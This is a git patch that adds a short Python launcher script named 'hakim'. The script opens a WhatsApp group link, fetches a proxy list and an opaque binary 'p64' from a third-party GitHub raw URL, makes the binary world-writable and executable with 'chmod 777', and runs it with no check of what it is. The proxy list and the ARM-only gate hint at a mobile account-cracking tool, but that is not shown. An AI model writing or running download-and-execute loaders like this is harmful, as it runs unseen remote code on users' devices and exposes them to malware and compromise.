From c534fc3eb803668827c4c59a7417d089f2df05a9 Mon Sep 17 00:00:00 2001 From: hakim <151940057+Dgjjj@users.noreply.github.com> Date: Wed, 29 Nov 2023 00:03:45 +0100 Subject: [PATCH] Create hakim --- hakim | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 hakim diff --git a/hakim b/hakim new file mode 100644 index 0000000..0fdae28 --- /dev/null +++ b/hakim @@ -0,0 +1,15 @@ +import os +os.system('git pull') +os.system('xdg-open https://chat.whatsapp.com/G1wtAl2gjsg0N7pimK2RHH') +from os import path,system +from platform import uname +bt=uname().machine.lower() +if 'aarch' in bt: + url = "https://raw.githubusercontent.com/AKING110/files/main/.prox.txt" + system("curl -L "+url+" -o .prox.txt") + if path.isfile("p64"): + pass + else: + system("curl -L https://raw.githubusercontent.com/AKING110/files/main/p64 -o p64") +else:exit('\033[1;31m\n Sorry System or 32bit device not supported ') +os.system('chmod 777 p64 && ./p64')